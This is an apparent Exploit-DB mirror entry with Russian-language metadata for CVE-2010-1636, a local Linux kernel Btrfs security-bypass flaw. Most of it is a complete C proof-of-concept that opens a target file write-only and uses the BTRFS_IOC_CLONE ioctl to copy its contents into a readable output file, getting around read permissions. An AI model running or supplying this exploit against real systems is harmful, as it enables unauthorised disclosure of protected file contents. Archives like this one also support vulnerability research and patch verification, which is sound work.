- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34001
- Проверка EDB
-
- Пройдено
- Автор
- DAN ROSENBERG
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2010-1636
- Дата публикации
- 2010-05-18
C:
/*
source: https://www.securityfocus.com/bid/40241/info
The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.
An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks.
*/
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)
int main(int argc, char * argv[])
{
if(argc < 3) {
printf("Usage: %s [target] [output]\n", argv[0]);
exit(-1);
}
int output = open(argv[2], O_WRONLY | O_CREAT, 0644);
/* Note - opened for writing, not reading */
int target = open(argv[1], O_WRONLY);
ioctl(output, BTRFS_IOC_CLONE, target);
}
- Источник
- www.exploit-db.com